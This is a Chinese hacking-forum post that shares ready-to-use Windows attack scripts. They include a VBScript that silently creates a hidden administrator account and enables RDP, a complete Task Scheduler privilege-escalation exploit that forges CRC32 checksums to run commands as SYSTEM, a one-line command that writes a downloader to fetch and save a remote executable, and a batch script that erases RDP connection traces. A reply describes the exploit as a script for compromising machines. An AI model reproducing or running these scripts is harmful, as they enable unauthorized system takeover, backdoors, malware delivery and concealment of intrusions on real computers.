一些vbs或者是bat的小程序代码
红盟大使2016/03/22软件综合 IP:广东
我知道这里会渗透的绝对不止我一个。。。

on error resume next

const HKEY_LOCAL_MACHINE = &H80000002

strComputer = "."

Set StdOut = XXXXXXXXXXdOut
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")



strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
XXXXXXXeateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
XXXXXXXeateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
XXXXXXXtDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
XXXXXXXtDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
XXXXXXXtDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue



on error resume next


dim username,password:If XXXXXXXXXXXXXXXXXXXXunt Then:username=XXXXXXXXXXguments(0):password=XXXXXXXXXXguments(1):Else:username="$DavieHacker":password="DavieSuper":end if:set wsnetwork=CreateObject("XXXXXXXXXXTWORK"):os="WinNT://"&XXXXXXXXXXXXXputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=XXXXXeate("user",username):XXXXXtPassword password:XXXXXtInfo:Set of=GetObject(os&"/"&username&",user"):XXXXXd(XXXXXsPath)'XXXXXXXXXXho XXXXXsPath
(以上是vbs提权代码,功能是建立一个超级管理员用户并且开启3389端口)
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------



<job id="tasksch-wD-0day">
<script language="Javascript">


crc_table = new Array(
0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419,
0x706AF48F, 0xE963A535, 0x9E6495A3, 0x0EDB8832, 0x79DCB8A4,
0xE0D5E91E, 0x97D2D988, 0x09B64C2B, 0x7EB17CBD, 0xE7B82D07,
0x90BF1D91, 0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE,
0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7, 0x136C9856,
0x646BA8C0, 0xFD62F97A, 0x8A65C9EC, 0x14015C4F, 0x63066CD9,
0xFA0F3D63, 0x8D080DF5, 0x3B6E20C8, 0x4C69105E, 0xD56041E4,
0xA2677172, 0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B,
0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940, 0x32D86CE3,
0x45DF5C75, 0xDCD60DCF, 0xABD13D59, 0x26D930AC, 0x51DE003A,
0xC8D75180, 0xBFD06116, 0x21B4F4B5, 0x56B3C423, 0xCFBA9599,
0xB8BDA50F, 0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924,
0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D, 0x76DC4190,
0x01DB7106, 0x98D220BC, 0xEFD5102A, 0x71B18589, 0x06B6B51F,
0x9FBFE4A5, 0xE8B8D433, 0x7807C9A2, 0x0F00F934, 0x9609A88E,
0xE10E9818, 0x7F6A0DBB, 0x086D3D2D, 0x91646C97, 0xE6635C01,
0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E, 0x6C0695ED,
0x1B01A57B, 0x8208F4C1, 0xF50FC457, 0x65B0D9C6, 0x12B7E950,
0x8BBEB8EA, 0xFCB9887C, 0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3,
0xFBD44C65, 0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2,
0x4ADFA541, 0x3DD895D7, 0xA4D1C46D, 0xD3D6F4FB, 0x4369E96A,
0x346ED9FC, 0xAD678846, 0xDA60B8D0, 0x44042D73, 0x33031DE5,
0xAA0A4C5F, 0xDD0D7CC9, 0x5005713C, 0x270241AA, 0xBE0B1010,
0xC90C2086, 0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F,
0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4, 0x59B33D17,
0x2EB40D81, 0xB7BD5C3B, 0xC0BA6CAD, 0xEDB88320, 0x9ABFB3B6,
0x03B6E20C, 0x74B1D29A, 0xEAD54739, 0x9DD277AF, 0x04DB2615,
0x73DC1683, 0xE3630B12, 0x94643B84, 0x0D6D6A3E, 0x7A6A5AA8,
0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1, 0xF00F9344,
0x8708A3D2, 0x1E01F268, 0x6906C2FE, 0xF762575D, 0x806567CB,
0x196C3671, 0x6E6B06E7, 0xFED41B76, 0x89D32BE0, 0x10DA7A5A,
0x67DD4ACC, 0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5,
0xD6D6A3E8, 0xA1D1937E, 0x38D8C2C4, 0x4FDFF252, 0xD1BB67F1,
0xA6BC5767, 0x3FB506DD, 0x48B2364B, 0xD80D2BDA, 0xAF0A1B4C,
0x36034AF6, 0x41047A60, 0xDF60EFC3, 0xA867DF55, 0x316E8EEF,
0x4669BE79, 0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236,
0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F, 0xC5BA3BBE,
0xB2BD0B28, 0x2BB45A92, 0x5CB36A04, 0xC2D7FFA7, 0xB5D0CF31,
0x2CD99E8B, 0x5BDEAE1D, 0x9B64C2B0, 0xEC63F226, 0x756AA39C,
0x026D930A, 0x9C0906A9, 0xEB0E363F, 0x72076785, 0x05005713,
0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38, 0x92D28E9B,
0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21, 0x86D3D2D4, 0xF1D4E242,
0x68DDB3F8, 0x1FDA836E, 0x81BE16CD, 0xF6B9265B, 0x6FB077E1,
0x18B74777, 0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C,
0x8F659EFF, 0xF862AE69, 0x616BFFD3, 0x166CCF45, 0xA00AE278,
0xD70DD2EE, 0x4E048354, 0x3903B3C2, 0xA7672661, 0xD06016F7,
0x4969474D, 0x3E6E77DB, 0xAED16A4A, 0xD9D65ADC, 0x40DF0B66,
0x37D83BF0, 0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9,
0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6, 0xBAD03605,
0xCDD70693, 0x54DE5729, 0x23D967BF, 0xB3667A2E, 0xC4614AB8,
0x5D681B02, 0x2A6F2B94, 0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B,
0x2D02EF8D
);


var hD='0123456789ABCDEF';


function dec2hex(d) {
h='';
for (i=0;i<8;i++) {
h = XXXXXarAt(d&15)+h;
d >>>= 4;
}
return h;
}
function encodeToHex(str){
    var r="";
    var e=str.length;
    var c=0;
    var h;
    while(c<e){
        h=XXXXXXarCodeAt(c++).toString(16);
        while(h.length<3) h="0"+h;
        r+=h;
    }
    return r;
}
function decodeFromHex(str){
    var r="";
    var e=str.length;
    var s=0;
    while(e>1){
        
        r=r+XXXXXXXXXomCharCode("0x"+str.substring(s,s+2));
        
        s=s+2;
        e=e-2;
    }
    
    return r;
    
}




function calc_crc(anyForm) {


anyTextString=decodeFromHex(anyForm);


Crc_value = 0xFFFFFFFF;
StringLength=anyTextString.length;
for (i=0; i<StringLength; i++) {
tableIndex = (XXXXXXXXXXXXXXXXarCodeAt(i) ^ Crc_value) & 0xFF;
Table_value = crc_table[tableIndex];
Crc_value >>>= 8;
Crc_value ^= Table_value;
}
Crc_value ^= 0xFFFFFFFF;
return dec2hex(Crc_value);


}


function rev_crc(leadString,endString,crc32) {
//
// First, we calculate the CRC-32 for the initial string
//
    anyTextString=decodeFromHex(leadString);
    
   Crc_value = 0xFFFFFFFF;
   StringLength=anyTextString.length;
   //document.write(alert(StringLength));
   for (var i=0; i<StringLength; i++) {
      tableIndex = (XXXXXXXXXXXXXXXXarCodeAt(i) ^ Crc_value) & 0xFF;
      Table_value = crc_table[tableIndex];
      Crc_value >>>= 8;
      Crc_value ^= Table_value;
   }
//
// Second, we calculate the CRC-32 without the final string
//
   crc=parseInt(crc32,16);
   crc ^= 0xFFFFFFFF;
   anyTextString=decodeFromHex(endString);
   StringLength=anyTextString.length;
   for (var i=0; i<StringLength; i++) {
      tableIndex=0;
      Table_value = crc_table[tableIndex];
      while (((Table_value ^ crc) >>> 24) & 0xFF) {
         tableIndex++;
         Table_value = crc_table[tableIndex];
      }
      crc ^= Table_value;
      crc <<= 8;
      crc |= tableIndex ^ XXXXXXXXXXXXXXXXarCodeAt(StringLength - i -1);
   }
//
// Now let's find the 4-byte string
//
   for (var i=0; i<4; i++) {
      tableIndex=0;
      Table_value = crc_table[tableIndex];
      while (((Table_value ^ crc) >>> 24) & 0xFF) {
         tableIndex++;
         Table_value = crc_table[tableIndex];
      }
      crc ^= Table_value;
      crc <<= 8;
      crc |= tableIndex;
   }
   crc ^= Crc_value;
//
// Finally, display the results
//
   var TextString=dec2hex(crc);
   var Teststring='';
Teststring=TextString.substring(6,8);
Teststring+=TextString.substring(4,6);
Teststring+=TextString.substring(2,4);
Teststring+=TextString.substring(0,2);
   return Teststring
}
function decodeFromHex(str){
    var r="";
    var e=str.length;
    var s=0;
    while(e>1){
        
        r=r+XXXXXXXXXomCharCode("0x"+str.substring(s,s+2));
        
        s=s+2;
        e=e-2;
    }
    
    return r;
    
}
</script>


<script language="VBScript">
dim output
set output = XXXXXXXXXXdout
output.writeline " Task Scheduler 0 day - Privilege Escalation "
output.writeline " Should work on Vista/Win7/2008 x86/x64"
output.writeline " webDEViL - w3bd3vil [at] gmail [dot] com" & vbCr & vbLf
biatchFile = XXXXXXXXXXeateObject("XXXXXXXXXXXXleSystemObject").GetSpecialFolder(2)+"\XXXXXXt"
Set objShell = CreateObject("XXXXXXXXXXell")
XXXXXXXXXXXn "schtasks /create /TN wDw00t /sc monthly /tr """+biatchFile+"""",,True


Set fso = CreateObject("XXXXXXXXXXXXleSystemObject")
Set a = XXXXXXeateTextFile(biatchFile, True)
a.WriteLine ("net user /add test123 test123")
a.WriteLine ("net localgroup administrators /add test123")
a.WriteLine ("schtasks /delete /f /TN wDw00t")


Function ReadByteArray(strFileName)
Const adTypeBinary = 1
Dim bin
    Set bin = CreateObject("XXXXXXXXream")
    bin.Type = adTypeBinary
    bin.Open
    bin.LoadFromFile strFileName
    ReadByteArray = XXXXXXad
'output.writeline ReadByteArray
End Function


Function OctetToHexStr (arrbytOctet)
Dim k
OctetToHexStr = ""
For k = 3 To Lenb (arrbytOctet)
OctetToHexStr = OctetToHexStr _
        & Right("0" & Hex(Ascb(Midb(arrbytOctet, k, 1))), 2)
Next
End Function
strFileName="C:\windows\system32\tasks\wDw00t"


hexXML = OctetToHexStr (ReadByteArray(strFileName))
'output.writeline hexXML
crc32 = calc_crc(hexXML)
output.writeline "Crc32 original: "+crc32




Set xmlDoc = CreateObject("Microsoft.XMLDOM")
'permissions workaround
'XXXXXXXXXXXn "cmd /c copy C:\windows\system32\tasks\wDw00t .",,True
'XXXXXXXXXXXn "cmd /c schtasks /query /XML /TN wDw00t > wDw00t.xml",,True
Set objShell = XXXXXXXXXXeateObject("XXXXXXXXXXell")
Set objExecObject = objShell.Exec("cmd /c schtasks /query /XML /TN wDw00t")


Do Until XXXXXXXXXXXXXXXXXXXXXXXEndOfStream
strLine = strLine & XXXXXXXXXXXXXXXXXXXXXXXadLine()
Loop
hexXML = "FFFE3C00"+OctetToHexStr(strLine)
'output.writeline hexXML
Set ts = XXXXXXeatetextfile ("wDw00t.xml")
For n = 1 To (Len (hexXML) - 1) step 2
ts.write Chr ("&h" & Mid (hexXML, n, 2))
Next
XXXXXose


xmlDoc.load "wDw00t.xml"
Set Author = XXXXXXXXXlectsinglenode ("//Task/RegistrationInfo/Author")
Author.text = "LocalSystem"
Set UserId = XXXXXXXXXlectsinglenode ("//Task/Principals/Principal/UserId")
UserId.text = "S-1-5-18"
XXXXXXXXXve(strFileName)


hexXML = OctetToHexStr (ReadByteArray(strFileName))


leadString=hexXML+"3C0021002D002D00"
endString="2D002D003E00"
'output.writeline leadString
impbytes=rev_crc(leadString,endString,crc32)
output.writeline "Crc32 Magic Bytes: "+impbytes


finalString = leadString+impbytes+endString
forge = calc_crc(finalString)
output.writeline "Crc32 Forged: "+forge


strHexString="FFFE"+finalString
Set fso = CreateObject ("XXXXXXXXXXXXlesystemobject")
Set stream = CreateObject ("XXXXXXXXream")


Set ts = XXXXXXeatetextfile (strFileName)


For n = 1 To (Len (strHexString) - 1) step 2
ts.write Chr ("&h" & Mid (strHexString, n, 2))
Next
XXXXXose




Set objShell = CreateObject("XXXXXXXXXXell")
XXXXXXXXXXXn "schtasks /change /TN wDw00t /disable",,True
XXXXXXXXXXXn "schtasks /change /TN wDw00t /enable",,True
XXXXXXXXXXXn "schtasks /run /TN wDw00t",,True


</script>
</job>
(Windows7-Windows2008提权exp-taskxpl 功能过于和谐,暂不介绍)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"XXXXXXXXXXXXXXXXXXXXXt/yueyan.exe^",0:XXXXXXXXnd():Set sGet = CreateObject(^"XXXXXXXXream^"):XXXXXXXde = 3:sGet.Type = 1:sGet.Open():sGet.Write(XXXXXXXXsponseBody):XXXXXXXveToFile ^"C:\yueyan.exe^",2 >down.vbs
(这是一个有着下载者功能的vbs代码)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------



@echo off
color 0A
title 3389连接痕迹清除     蛋清@F4ckTeam
mode con cols=88 lines=20
set /p fk= 确定要清空3389连接痕迹吗?(y/n)
if /i "%fk%"=="y" goto y
if /i "%fk%"=="n" goto n
call %0


:y
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client" /f
del /a /f /q %HOMEPATH%\Documents\Default.rdp
echo 命令执行成功,请手动查看是否清除。
pause >nul


:n
exit
(这是一段能够清除连接痕迹的代码,非常实用)


不知道这些内容会不会被和谐
来自:计算机科学 / 软件综合
3
已屏蔽 原因:{{ notice.reason }}已屏蔽
{{notice.noticeContent}}
~~空空如也
红盟大使 作者
8年9个月前 IP:广东
813527
引用 novakon:
不要倒一篮子代码,论坛不是垃圾桶。这是个用0-day拿肉鸡的脚本,应该作为文件传上来。
谢谢建议,不过其实我也是怕有些小学生心理的人拿来害人,这些是提权脚本,抓鸡的话还得换过别的。。。
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论

想参与大家的讨论?现在就 登录 或者 注册

所属专业
上级专业
同级专业
红盟大使
笔友
文章
34
回复
507
学术分
0
2015/12/12注册,6年11个月前活动
暂无简介
主体类型:个人
所属领域:无
认证方式:邮箱
IP归属地:广东
文件下载
加载中...
{{errorInfo}}
{{downloadWarning}}
你在 {{downloadTime}} 下载过当前文件。
文件名称:{{resource.defaultFile.name}}
下载次数:{{resource.hits}}
上传用户:{{uploader.username}}
所需积分:{{costScores}},{{holdScores}}下载当前附件免费{{description}}
积分不足,去充值
文件已丢失

当前账号的附件下载数量限制如下:
时段 个数
{{f.startingTime}}点 - {{f.endTime}}点 {{f.fileCount}}
视频暂不能访问,请登录试试
仅供内部学术交流或培训使用,请先保存到本地。本内容不代表科创观点,未经原作者同意,请勿转载。
音频暂不能访问,请登录试试
支持的图片格式:jpg, jpeg, png
插入公式
评论控制
加载中...
文号:{{pid}}
投诉或举报
加载中...
{{tip}}
请选择违规类型:
{{reason.type}}

空空如也

加载中...
详情
详情
推送到专栏从专栏移除
设为匿名取消匿名
查看作者
回复
只看作者
加入收藏取消收藏
收藏
取消收藏
折叠回复
置顶取消置顶
评学术分
鼓励
设为精选取消精选
管理提醒
编辑
通过审核
评论控制
退修或删除
历史版本
违规记录
投诉或举报
加入黑名单移除黑名单
查看IP
{{format('YYYY/MM/DD HH:mm:ss', toc)}}